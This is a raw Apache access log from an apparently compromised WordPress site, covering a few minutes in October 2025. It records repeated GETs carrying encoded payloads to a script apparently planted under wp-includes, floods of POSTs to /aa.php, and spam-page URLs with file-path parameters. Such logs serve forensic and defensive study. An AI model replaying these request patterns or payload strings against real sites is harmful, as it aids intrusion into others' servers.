198.54.126.113 - - [27/Oct/2025:13:32:44 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538393936342p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538363336342q3434316531653735306134663532656533383033663236633663373931396335222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
66.249.77.167 - - [27/Oct/2025:13:37:43 -0400] "GET /fresh026008253.html HTTP/1.1" 200 23774 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.167 - - [27/Oct/2025:13:37:47 -0400] "GET /crop005020778.html HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
198.54.126.113 - - [27/Oct/2025:13:33:04 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538393938342p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538363338342q3138316232663133656263343064326138326565623130373363363964346366222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
198.54.126.113 - - [27/Oct/2025:13:33:24 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313539303030342p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538363430342q3239663163646461323233323063343763376334316636343137616262323361222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
66.249.77.160 - - [27/Oct/2025:13:38:26 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/wp-mail.php??market=57051185 HTTP/1.1" 200 19951 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
180.248.28.215 - - [27/Oct/2025:13:38:39 -0400] "GET /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:38:42 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:38:42 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:38:43 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
198.54.126.113 - - [27/Oct/2025:13:33:44 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313539303032342p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538363432342q3736653030636662313065303939373563653664323130376364303363393134222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:38:45 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:38:46 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:38:47 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:38:47 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:38:48 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:38:48 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:38:49 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:38:49 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:38:50 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:38:52 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:38:53 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:38:55 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:38:55 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:38:56 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:38:58 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:38:59 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:38:59 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:39:01 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:39:01 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:39:02 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:39:03 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
198.54.126.113 - - [27/Oct/2025:13:34:04 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313539303034342p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538363434342q3438346161366266323232623764336465653737646634336535326431663837222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:39:04 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
66.249.77.160 - - [27/Oct/2025:13:39:05 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/wp-mail.php??market=64823020 HTTP/1.1" 200 23852 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
180.248.28.215 - - [27/Oct/2025:13:39:06 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:39:07 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:39:08 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:39:10 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:39:12 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:39:13 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:39:15 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:39:17 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:39:18 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:39:19 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:39:21 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
66.249.77.167 - - [27/Oct/2025:13:39:21 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/dcuiz.php??market=60968101 HTTP/1.1" 200 24815 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
180.248.28.215 - - [27/Oct/2025:13:39:22 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:39:23 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
198.54.126.113 - - [27/Oct/2025:13:34:24 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313539303036342p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538363436342q3234313535383632383830663730323935383631306235626239626436363861222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
69.197.149.50 - - [27/Oct/2025:13:39:23 -0400] "GET /wp-includes/qqee080c/index.php?id=237934 HTTP/1.1" 200 0 "http://emporiumlooks.com/wp-includes/qqee080c/index.php?id=237934" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
180.248.28.215 - - [27/Oct/2025:13:39:26 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:39:27 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:39:28 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:39:30 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:39:32 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:39:32 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:39:33 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:39:33 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:39:35 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:39:35 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:39:36 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:39:37 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:39:38 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:39:41 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:39:41 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:39:42 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:39:42 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:39:43 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
198.54.126.113 - - [27/Oct/2025:13:34:44 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313539303038342p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538363438342q3838306562636163303661303633396635663134346461666232366637333934222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:39:44 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
66.249.77.167 - - [27/Oct/2025:13:39:44 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/wp-mail.php??market=62887077 HTTP/1.1" 200 23998 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
180.248.28.215 - - [27/Oct/2025:13:39:46 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
185.146.113.215 - - [27/Oct/2025:13:39:46 -0400] "GET /wp-json/wp/v2/posts HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
180.248.28.215 - - [27/Oct/2025:13:39:47 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:39:49 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:39:50 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
66.249.77.167 - - [27/Oct/2025:13:39:49 -0400] "GET /products/34qv46236 HTTP/1.1" 200 23657 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
180.248.28.215 - - [27/Oct/2025:13:39:52 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:39:53 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:39:55 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:39:58 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:39:59 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:01 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:03 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
198.54.126.113 - - [27/Oct/2025:13:35:04 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313539303130342p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538363530342q3337613937313938333337646539663939353136636364396265663031383236222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:07 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:08 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:10 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:10 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:12 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:12 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:15 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:17 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:17 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:18 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:18 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:19 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:19 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:21 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:22 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:22 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:23 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:23 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
198.54.126.113 - - [27/Oct/2025:13:35:24 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313539303132342p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538363532342q3866643336626532373562373835333765363061646630376634306432646235222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
66.249.77.160 - - [27/Oct/2025:13:40:23 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/wp-mail.php??market=56203406 HTTP/1.1" 200 23883 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
180.248.28.215 - - [27/Oct/2025:13:40:25 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:27 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:28 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:29 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:29 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:30 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:31 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:33 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:35 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:38 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:40 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:42 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:44 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
198.54.126.113 - - [27/Oct/2025:13:35:45 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313539303134352p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538363534352q3539346238383330323363636637643937373134346432343634383338346662222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:45 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:46 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:48 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:49 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:50 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:51 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:51 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:52 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:52 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:53 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:53 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:54 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:54 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
69.197.149.50 - - [27/Oct/2025:13:40:52 -0400] "GET /wp-includes/qqee080c/index.php?id=237934 HTTP/1.1" 200 0 "http://emporiumlooks.com/wp-includes/qqee080c/index.php?id=237934" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
180.248.28.215 - - [27/Oct/2025:13:40:55 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:55 -0400] "POST /aa.php HTTP/1.1" 404 1251 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:55 -0400] "POST /aa.php HTTP/1.1" 404 1251 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:55 -0400] "POST /aa.php HTTP/1.1" 404 1251 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:56 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:56 -0400] "POST /aa.php HTTP/1.1" 404 1251 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:56 -0400] "POST /aa.php HTTP/1.1" 404 1251 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:57 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:58 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:40:59 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:41:01 -0400] "POST /aa.php HTTP/1.1" 301 795 "-" "-"
66.249.77.168 - - [27/Oct/2025:13:41:02 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/dcuiz.php??market=60962500 HTTP/1.1" 200 23897 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.77.160 - - [27/Oct/2025:13:41:02 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/dcuiz.php?market=60199334 HTTP/1.1" 200 24172 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
198.54.126.113 - - [27/Oct/2025:13:36:06 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313539303136362p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538363536362q6566306438373138373839333730373136646135613562663839626431643435222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
198.54.126.113 - - [27/Oct/2025:13:36:26 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313539303138362p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538363538362q6531313437396230636434643730383936343831643436633638613031316663222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
66.249.77.168 - - [27/Oct/2025:13:41:42 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/dcuiz.php??market=59010811 HTTP/1.1" 200 24572 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
198.54.126.113 - - [27/Oct/2025:13:36:46 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313539303230362p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538363630362q6435323966666461643062633631303834333035396533663463663733353165222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
66.249.77.167 - - [27/Oct/2025:13:41:57 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/xmlrpc.php??market=69501895 HTTP/1.1" 200 24574 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
198.54.126.113 - - [27/Oct/2025:13:37:07 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313539303232372p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538363632372q6236326561363130626636653433303336643664653464333766653063663161222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
